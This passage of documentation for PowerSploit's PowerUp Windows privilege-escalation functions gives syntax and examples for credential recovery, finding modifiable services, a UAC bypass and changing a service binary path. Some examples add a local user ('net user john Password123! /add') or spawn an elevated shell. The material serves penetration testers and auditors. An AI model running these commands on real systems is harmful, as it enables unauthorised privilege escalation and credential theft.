77 | ### System.Data.DataTable
78 |
79 | System.Boolean
80 |
81 | ## NOTES
82 | Author: Scott Sutherland - 2014, NetSPI
83 | Version: Get-ApplicationHost v1.0
84 | Comments: Should work on IIS 6 and Above
85 |
86 | ## RELATED LINKS
87 |
88 | [https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
89 | http://www.netspi.com
90 | http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
91 | http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
92 | http://www.netspi.com
93 | http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
94 | http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)
95 |
96 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-CachedGPPPassword.md:
--------------------------------------------------------------------------------
1 | # Get-CachedGPPPassword
2 |
3 | ## SYNOPSIS
4 | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and
5 | left in cached files on the host.
6 |
7 | Author: Chris Campbell (@obscuresec)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-CachedGPPPassword
15 | ```
16 |
17 | ## DESCRIPTION
18 | Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and
19 | datasources.xml files and returns plaintext passwords.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-CachedGPPPassword
26 | ```
27 |
28 | NewName : \[BLANK\]
29 | Changed : {2013-04-25 18:36:07}
30 | Passwords : {Super!!!Password}
31 | UserNames : {SuperSecretBackdoor}
32 | File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7
33 | C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr
34 | oups.xml
35 |
36 | ## PARAMETERS
37 |
38 | ## INPUTS
39 |
40 | ## OUTPUTS
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 | [http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
47 | https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
48 | https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
49 | http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
50 | http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
51 | https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
52 | https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
53 | http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
54 | http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html)
55 |
56 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiablePath.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiablePath
2 |
3 | ## SYNOPSIS
4 | Parses a passed string containing multiple possible file/folder paths and returns
5 | the file paths where the current user has modification rights.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiablePath [-Path] [-Literal]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Takes a complex path specification of an initial file/folder path with possible
19 | configuration files, 'tokenizes' the string in a number of possible ways, and
20 | enumerates the ACLs for each path that currently exists on the system.
21 | Any path that
22 | the current user has modification rights on is returned in a custom object that contains
23 | the modifiable path, associated permission set, and the IdentityReference with the specified
24 | rights.
25 | The SID of the current user and any group he/she are a part of are used as the
26 | comparison set against the parsed path DACLs.
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | '"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath
33 | ```
34 |
35 | Path Permissions IdentityReference
36 | ---- ----------- -----------------
37 | C:\Temp\blah.exe {ReadAttributes, ReadCo...
38 | NT AUTHORITY\Authentic...
39 | C:\Temp\config.ini {ReadAttributes, ReadCo...
40 | NT AUTHORITY\Authentic...
41 |
42 | ### -------------------------- EXAMPLE 2 --------------------------
43 | ```
44 | Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath
45 | ```
46 |
47 | Path Permissions IdentityReference
48 | ---- ----------- -----------------
49 | C:\Vuln\blah.bat {ReadAttributes, ReadCo...
50 | NT AUTHORITY\Authentic...
51 | C:\Vuln\config.ini {ReadAttributes, ReadCo...
52 | NT AUTHORITY\Authentic...
53 | ...
54 |
55 | ## PARAMETERS
56 |
57 | ### -Path
58 | The string path to parse for modifiable files.
59 | Required
60 |
61 | ```yaml
62 | Type: String[]
63 | Parameter Sets: (All)
64 | Aliases: FullName
65 |
66 | Required: True
67 | Position: 1
68 | Default value: None
69 | Accept pipeline input: True (ByPropertyName, ByValue)
70 | Accept wildcard characters: False
71 | ```
72 |
73 | ### -Literal
74 | Switch.
75 | Treat all paths as literal (i.e.
76 | don't do 'tokenization').
77 |
78 | ```yaml
79 | Type: SwitchParameter
80 | Parameter Sets: (All)
81 | Aliases: LiteralPaths
82 |
83 | Required: False
84 | Position: Named
85 | Default value: False
86 | Accept pipeline input: False
87 | Accept wildcard characters: False
88 | ```
89 |
90 | ## INPUTS
91 |
92 | ## OUTPUTS
93 |
94 | ### PowerUp.TokenPrivilege.ModifiablePath
95 |
96 | Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for
97 | a modifiable path.
98 |
99 | ## NOTES
100 |
101 | ## RELATED LINKS
102 |
103 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableRegistryAutoRun.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableRegistryAutoRun
2 |
3 | ## SYNOPSIS
4 | Returns any elevated system autoruns in which the current user can
5 | modify part of the path string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableRegistryAutoRun
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates a number of autorun specifications in HKLM and filters any
19 | autoruns through Get-ModifiablePath, returning any file/config locations
20 | in the found path strings that the current user can modify.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-ModifiableRegistryAutoRun
27 | ```
28 |
29 | Return vulneable autorun binaries (or associated configs).
30 |
31 | ## PARAMETERS
32 |
33 | ## INPUTS
34 |
35 | ## OUTPUTS
36 |
37 | ### PowerUp.ModifiableRegistryAutoRun
38 |
39 | Custom PSObject containing results.
40 |
41 | ## NOTES
42 |
43 | ## RELATED LINKS
44 |
45 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableScheduledTaskFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableScheduledTaskFile
2 |
3 | ## SYNOPSIS
4 | Returns scheduled tasks where the current user can modify any file
5 | in the associated task action string.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ModifiableScheduledTaskFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
19 | and parses the XML specification for each task, extracting the command triggers.
20 | Each trigger string is filtered through Get-ModifiablePath, returning any file/config
21 | locations in the found path strings that the current user can modify.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ModifiableScheduledTaskFile
28 | ```
29 |
30 | Return scheduled tasks with modifiable command strings.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.ModifiableScheduledTaskFile
39 |
40 | Custom PSObject containing results.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableService.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableService
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns services for which the current user can modify the binPath.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableService
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
18 | the current user has rights to change the service configuration.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-ModifiableService
25 | ```
26 |
27 | Get a set of potentially exploitable services.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.ModifiablePath
36 |
37 | ## NOTES
38 |
39 | ## RELATED LINKS
40 |
41 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ModifiableServiceFile.md:
--------------------------------------------------------------------------------
1 | # Get-ModifiableServiceFile
2 |
3 | ## SYNOPSIS
4 | Enumerates all services and returns vulnerable service files.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ModifiableServiceFile
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates all services by querying the WMI win32_service class.
18 | For each service,
19 | it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine
20 | if the current user has rights to modify the service binary itself or any associated
21 | arguments.
22 | If the associated binary (or any configuration files) can be overwritten,
23 | privileges may be able to be escalated.
24 |
25 | ## EXAMPLES
26 |
27 | ### -------------------------- EXAMPLE 1 --------------------------
28 | ```
29 | Get-ModifiableServiceFile
30 | ```
31 |
32 | Get a set of potentially exploitable service binares/config files.
33 |
34 | ## PARAMETERS
35 |
36 | ## INPUTS
37 |
38 | ## OUTPUTS
39 |
40 | ### PowerUp.ModifiablePath
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-RegistryAlwaysInstallElevated.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAlwaysInstallElevated
2 |
3 | ## SYNOPSIS
4 | Checks if any of the AlwaysInstallElevated registry keys are set.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAlwaysInstallElevated
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
18 | or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
19 | are set, $False otherwise.
20 | If one of these keys are set, then all .MSI files run with
21 | elevated permissions, regardless of current user permissions.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-RegistryAlwaysInstallElevated
28 | ```
29 |
30 | Returns $True if any of the AlwaysInstallElevated registry keys are set.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### System.Boolean
39 |
40 | $True if RegistryAlwaysInstallElevated is set, $False otherwise.
41 |
42 | ## NOTES
43 |
44 | ## RELATED LINKS
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-RegistryAutoLogon.md:
--------------------------------------------------------------------------------
1 | # Get-RegistryAutoLogon
2 |
3 | ## SYNOPSIS
4 | Finds any autologon credentials left in the registry.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-RegistryAutoLogon
14 | ```
15 |
16 | ## DESCRIPTION
17 | Checks if any autologon accounts/credentials are set in a number of registry locations.
18 | If they are, the credentials are extracted and returned as a custom PSObject.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-RegistryAutoLogon
25 | ```
26 |
27 | Finds any autologon credentials left in the registry.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.RegistryAutoLogon
36 |
37 | Custom PSObject containing autologin credentials found in the registry.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)
44 |
45 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ServiceDetail.md:
--------------------------------------------------------------------------------
1 | # Get-ServiceDetail
2 |
3 | ## SYNOPSIS
4 | Returns detailed information about a specified service by querying the
5 | WMI win32_service class for the specified service name.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ServiceDetail [-Name]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
19 | the pipeline object returned by Get-Service, extracts out the service name, queries the
20 | WMI win32_service class for the specified service for details like binPath, and outputs
21 | everything.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-ServiceDetail -Name VulnSVC
28 | ```
29 |
30 | Gets detailed information about the 'VulnSVC' service.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service VulnSVC | Get-ServiceDetail
35 | ```
36 |
37 | Gets detailed information about the 'VulnSVC' service.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to query information for.
43 |
44 | ```yaml
45 | Type: String[]
46 | Parameter Sets: (All)
47 | Aliases: ServiceName
48 |
49 | Required: True
50 | Position: 1
51 | Default value: None
52 | Accept pipeline input: True (ByPropertyName, ByValue)
53 | Accept wildcard characters: False
54 | ```
55 |
56 | ## INPUTS
57 |
58 | ## OUTPUTS
59 |
60 | ### System.Management.ManagementObject
61 |
62 | ## NOTES
63 |
64 | ## RELATED LINKS
65 |
66 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-SiteListPassword.md:
--------------------------------------------------------------------------------
1 | # Get-SiteListPassword
2 |
3 | ## SYNOPSIS
4 | Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
5 | Based on Jerome Nokin (@funoverip)'s Python solution (in links).
6 |
7 | Author: Jerome Nokin (@funoverip)
8 | PowerShell Port: @harmj0y
9 | License: BSD 3-Clause
10 | Required Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-SiteListPassword [[-Path] ]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
20 | C:\Documents and Settings\, or C:\Users\.
21 | For any files found, the appropriate
22 | credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword
23 | function that takes advantage of McAfee's static key encryption.
24 | Any decrypted credentials
25 | are output in custom objects.
26 | See links for more information.
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | Get-SiteListPassword
33 | ```
34 |
35 | EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
36 | UserName :
37 | Path : Products/CommonUpdater
38 | Name : McAfeeHttp
39 | DecPassword : MyStrongPassword!
40 | Enabled : 1
41 | DomainName :
42 | Server : update.nai.com:80
43 |
44 | EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
45 | UserName : McAfeeService
46 | Path : Repository$
47 | Name : Paris
48 | DecPassword : MyStrongPassword!
49 | Enabled : 1
50 | DomainName : companydomain
51 | Server : paris001
52 |
53 | EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
54 | UserName : McAfeeService
55 | Path : Repository$
56 | Name : Tokyo
57 | DecPassword : MyStrongPassword!
58 | Enabled : 1
59 | DomainName : companydomain
60 | Server : tokyo000
61 |
62 | ## PARAMETERS
63 |
64 | ### -Path
65 | Optional path to a SiteList.xml file or folder.
66 |
67 | ```yaml
68 | Type: String[]
69 | Parameter Sets: (All)
70 | Aliases:
71 |
72 | Required: False
73 | Position: 1
74 | Default value: None
75 | Accept pipeline input: True (ByValue)
76 | Accept wildcard characters: False
77 | ```
78 |
79 | ## INPUTS
80 |
81 | ## OUTPUTS
82 |
83 | ### PowerUp.SiteListPassword
84 |
85 | ## NOTES
86 |
87 | ## RELATED LINKS
88 |
89 | [https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
90 | https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
91 | https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
92 | https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
93 | https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
94 | https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
95 | https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)
96 |
97 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-UnattendedInstallFile.md:
--------------------------------------------------------------------------------
1 | # Get-UnattendedInstallFile
2 |
3 | ## SYNOPSIS
4 | Checks several locations for remaining unattended installation files,
5 | which may have deployment credentials.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnattendedInstallFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | {{Fill in the Description}}
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-UnattendedInstallFile
25 | ```
26 |
27 | Finds any remaining unattended installation files.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.UnattendedInstallFile
36 |
37 | Custom PSObject containing results.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)
44 |
45 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-UnquotedService.md:
--------------------------------------------------------------------------------
1 | # Get-UnquotedService
2 |
3 | ## SYNOPSIS
4 | Get-UnquotedService Returns the name and binary path for services with unquoted paths
5 | that also have a space in the name.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnquotedService
15 | ```
16 |
17 | ## DESCRIPTION
18 | Uses Get-WmiObject to query all win32_service objects and extract out
19 | the binary pathname for each.
20 | Then checks if any binary paths have a space
21 | and aren't quoted.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-UnquotedService
28 | ```
29 |
30 | Get a set of potentially exploitable services.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.UnquotedService
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Invoke-PrivescAudit.md:
--------------------------------------------------------------------------------
1 | # Invoke-PrivescAudit
2 |
3 | ## SYNOPSIS
4 | Executes all functions that check for various Windows privilege escalation opportunities.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-PrivescAudit [-HTMLReport]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Executes all functions that check for various Windows privilege escalation opportunities.
18 |
19 | ## EXAMPLES
20 |
21 | ### -------------------------- EXAMPLE 1 --------------------------
22 | ```
23 | Invoke-PrivescAudit
24 | ```
25 |
26 | Runs all escalation checks and outputs a status report for discovered issues.
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Invoke-PrivescAudit -HTMLReport
31 | ```
32 |
33 | Runs all escalation checks and outputs a status report to SYSTEM.username.html
34 | detailing any discovered issues.
35 |
36 | ## PARAMETERS
37 |
38 | ### -HTMLReport
39 | Switch.
40 | Write a HTML version of the report to SYSTEM.username.html.
41 |
42 | ```yaml
43 | Type: SwitchParameter
44 | Parameter Sets: (All)
45 | Aliases:
46 |
47 | Required: False
48 | Position: Named
49 | Default value: False
50 | Accept pipeline input: False
51 | Accept wildcard characters: False
52 | ```
53 |
54 | ## INPUTS
55 |
56 | ## OUTPUTS
57 |
58 | ### System.String
59 |
60 | ## NOTES
61 |
62 | ## RELATED LINKS
63 |
64 |
--------------------------------------------------------------------------------
/docs/Privesc/Invoke-WScriptUACBypass.md:
--------------------------------------------------------------------------------
1 | # Invoke-WScriptUACBypass
2 |
3 | ## SYNOPSIS
4 | Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.
5 |
6 | Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-WScriptUACBypass [-Command] [-WindowStyle ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute
18 | VBScript using the wscript executable with the new manifest.
19 | The VBScript executed by
20 | C:\Windows\wscript.exe will run elevated.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | "
27 | ```
28 |
29 | Launches the specified PowerShell encoded command in high-integrity.
30 |
31 | ### -------------------------- EXAMPLE 2 --------------------------
32 | ```
33 | Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'
34 | ```
35 |
36 | Spawns a high integrity cmd.exe.
37 |
38 | ## PARAMETERS
39 |
40 | ### -Command
41 | The shell command you want wscript.exe to run elevated.
42 |
43 | ```yaml
44 | Type: String
45 | Parameter Sets: (All)
46 | Aliases: CMD
47 |
48 | Required: True
49 | Position: 1
50 | Default value: None
51 | Accept pipeline input: True (ByPropertyName, ByValue)
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ### -WindowStyle
56 | Whether to display or hide the window for the executed '-Command X'.
57 | Accepted values are 'Hidden' and 'Normal'/'Visible.
58 | Default is 'Hidden'.
59 |
60 | ```yaml
61 | Type: String
62 | Parameter Sets: (All)
63 | Aliases:
64 |
65 | Required: False
66 | Position: Named
67 | Default value: Hidden
68 | Accept pipeline input: False
69 | Accept wildcard characters: False
70 | ```
71 |
72 | ## INPUTS
73 |
74 | ## OUTPUTS
75 |
76 | ## NOTES
77 |
78 | ## RELATED LINKS
79 |
80 | [http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
81 | https://github.com/Vozzie/uacscript
82 | https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
83 | https://github.com/Vozzie/uacscript
84 | https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)
85 |
86 |
--------------------------------------------------------------------------------
/docs/Privesc/Restore-ServiceBinary.md:
--------------------------------------------------------------------------------
1 | # Restore-ServiceBinary
2 |
3 | ## SYNOPSIS
4 | Restores a service binary backed up by Install-ServiceBinary.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-ServiceDetail, Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Restore-ServiceBinary [-Name] [[-BackupPath] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
18 | checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
19 | binary location.
20 | If it exists, the backup binary is restored to the original
21 | binary path.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Restore-ServiceBinary -Name VulnSVC
28 | ```
29 |
30 | Restore the original binary for the service 'VulnSVC'.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service VulnSVC | Restore-ServiceBinary
35 | ```
36 |
37 | Restore the original binary for the service 'VulnSVC'.
38 |
39 | ### -------------------------- EXAMPLE 3 --------------------------
40 | ```
41 | Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
42 | ```
43 |
44 | Restore the original binary for the service 'VulnSVC' from a custom location.
45 |
46 | ## PARAMETERS
47 |
48 | ### -Name
49 | The service name to restore a binary for.
50 |
51 | ```yaml
52 | Type: String
53 | Parameter Sets: (All)
54 | Aliases: ServiceName
55 |
56 | Required: True
57 | Position: 1
58 | Default value: None
59 | Accept pipeline input: True (ByPropertyName, ByValue)
60 | Accept wildcard characters: False
61 | ```
62 |
63 | ### -BackupPath
64 | Optional manual path to the backup binary.
65 |
66 | ```yaml
67 | Type: String
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: 2
73 | Default value: None
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ## INPUTS
79 |
80 | ## OUTPUTS
81 |
82 | ### PowerUp.ServiceBinary.Installed
83 |
84 | ## NOTES
85 |
86 | ## RELATED LINKS
87 |
88 |
--------------------------------------------------------------------------------
/docs/Privesc/Set-ServiceBinaryPath.md:
--------------------------------------------------------------------------------
1 | # Set-ServiceBinaryPath
2 |
3 | ## SYNOPSIS
4 | Sets the binary path for a service to a specified value.
5 |
6 | Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Set-ServiceBinaryPath [-Name] [-Path]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
18 | service handle to the service with ConfigControl access using the GetServiceHandle
19 | Win32 API call.
20 | ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
21 | to the string value specified by binPath, and the handle is closed off.
22 |
23 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
24 | Dacl field to each object.
25 | It does this by opening a handle with ReadControl for the
26 | service with using the GetServiceHandle Win32 API call and then uses
27 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
28 |
29 | ## EXAMPLES
30 |
31 | ### -------------------------- EXAMPLE 1 --------------------------
32 | ```
33 | Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
34 | ```
35 |
36 | Sets the binary path for 'VulnSvc' to be a command to add a user.
37 |
38 | ### -------------------------- EXAMPLE 2 --------------------------
39 | ```
40 | Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
41 | ```
42 |
43 | Sets the binary path for 'VulnSvc' to be a command to add a user.
44 |
45 | ## PARAMETERS
46 |
47 | ### -Name
48 | An array of one or more service names to set the binary path for.
49 | Required.
50 |
51 | ```yaml
52 | Type: String[]
53 | Parameter Sets: (All)
54 | Aliases: ServiceName
55 |
56 | Required: True
57 | Position: 1
58 | Default value: None
59 | Accept pipeline input: True (ByPropertyName, ByValue)
60 | Accept wildcard characters: False
61 | ```
62 |
63 | ### -Path
64 | The new binary path (lpBinaryPathName) to set for the specified service.
65 | Required.
66 |
67 | ```yaml
68 | Type: String
69 | Parameter Sets: (All)
70 | Aliases: BinaryPath, binPath
71 |
72 | Required: True
73 | Position: 2
74 | Default value: None
75 | Accept pipeline input: False
76 | Accept wildcard characters: False
77 | ```
78 |
79 | ## INPUTS
80 |
81 | ## OUTPUTS
82 |
83 | ### System.Boolean
84 |
85 | $True if configuration succeeds, $False otherwise.
86 |
87 | ## NOTES
88 |
89 | ## RELATED LINKS
90 |
91 | [https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx)
92 |
93 |
--------------------------------------------------------------------------------
/docs/Privesc/Write-UserAddMSI.md:
--------------------------------------------------------------------------------
1 | # Write-UserAddMSI
2 |
3 | ## SYNOPSIS
4 | Writes out a precompiled MSI installer that prompts for a user/group addition.
5 | This function can be used to abuse Get-RegistryAlwaysInstallElevated.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
